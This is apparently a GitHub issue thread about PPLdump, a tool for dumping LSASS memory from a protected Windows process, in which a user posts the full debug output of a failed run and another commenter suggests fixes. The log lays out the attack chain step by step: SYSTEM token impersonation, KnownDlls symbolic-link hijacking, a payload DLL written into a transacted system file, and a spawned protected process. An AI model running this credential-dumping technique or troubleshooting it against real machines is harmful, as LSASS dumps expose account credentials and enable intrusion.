aaaddress1
commented
2 years ago ensure that arch of DLL for hijacking is the same as LSASS e.g. 64-bit DLL for 64-bit LSASS? seems like your DLL is okay & mapped into symbol object directory (KernelObjects) but not loaded by the app loader of new service (PPL mode).
Successfully compiled the code and ran from an admin terminal with debug but didn't get the expected extraction of lsass.dmp. Everything appeared to be working fine up until the last couple of lines. Any thoughts are appreciated!
PS C:\Users\xxxxx\git\PPLdump\x64\Release> .\PPLdump.exe -d -f lsass lsass.dmp [xxxxx] [] Found a process with name 'lsass' and PID 1180 [DEBUG][xxxxx] Check requirements [DEBUG][xxxxx] Target process protection level: 4 - PsProtectedSignerLsa-Light [xxxxx] [] Requirements OK [DEBUG][xxxxx] Get the name of the DLL to hijack [xxxxx] [] DLL to hijack: EventAggregation.dll [xxxxx] [] Current user is SYSTEM? -> FALSE [DEBUG][xxxxx] Found a potential Process candidate: PID=1152 - Image='LsaIso.exe' - User='NT AUTHORITY\SYSTEM' [DEBUG][xxxxx] This token is not restricted. [DEBUG][xxxxx] Found 2/2 required privileges in token. [DEBUG][xxxxx] Found a valid Token candidate. [SYSTEM] [] Impersonating SYSTEM... [DEBUG][SYSTEM] Create object directory '\GLOBAL??\KnownDlls'... [SYSTEM] [] Created Object Directory: '\GLOBAL??\KnownDlls' [DEBUG][SYSTEM] Create symbolic link '\GLOBAL??\KnownDlls\EventAggregation.dll'... [SYSTEM] [] Created Symbolic link: '\GLOBAL??\KnownDlls\EventAggregation.dll' [DEBUG][xxxxx] Create symbolic link '\??\GLOBALROOT -> \GLOBAL??'... [xxxxx] [] Created symbolic link: '\??\GLOBALROOT -> \GLOBAL??' [DEBUG][xxxxx] Call DefineDosDevice to create '\KnownDlls\EventAggregation.dll' -> '\KernelObjects\EventAggregation.dll' [-] DefineDosDevice failed with error code 183 - Cannot create a file when that file already exists. [xxxxx] [] DefineDosDevice OK [DEBUG][xxxxx] Impersonate SYSTEM again [SYSTEM] [] Impersonating SYSTEM... [DEBUG][SYSTEM] Check whether the symbolic link was really created in '\KnownDlls\' [SYSTEM] [+] The symbolic link was successfully created: '\KnownDlls\EventAggregation.dll' -> '\KernelObjects\EventAggregation.dll' [DEBUG][SYSTEM] Map our DLL to section '\KernelObjects\EventAggregation.dll' [DEBUG][SYSTEM] Loaded payload DLL, image size: 128512 bytes [DEBUG][SYSTEM] Found file for transaction: C:\WINDOWS\system32\appverifUI.dll [DEBUG][SYSTEM] Opened file 'C:\WINDOWS\system32\appverifUI.dll' for transaction. [DEBUG][SYSTEM] Wrote 128512 bytes of embedded payload DLL to transacted file. [SYSTEM] [] Mapped payload DLL to: '\KernelObjects\EventAggregation.dll' [DEBUG][SYSTEM] Enable privilege SeAssignPrimaryTokenPrivilege [DEBUG][SYSTEM] Create a primary token [DEBUG][SYSTEM] Create protected process with command line: C:\WINDOWS\system32\services.exe 1180 "lsass.dmp" b01c2517-790a-4bec-aa9b-cb576e7f712 -d [SYSTEM] [] Started protected process, waiting... [DEBUG][SYSTEM] Unmap section '\KernelObjects\EventAggregation.dll'... [DEBUG][SYSTEM] Process exit code: 0 [-] The DLL was not loaded. :/ PS C:\Users\xxxxx\git\PPLdump\x64\Release> ls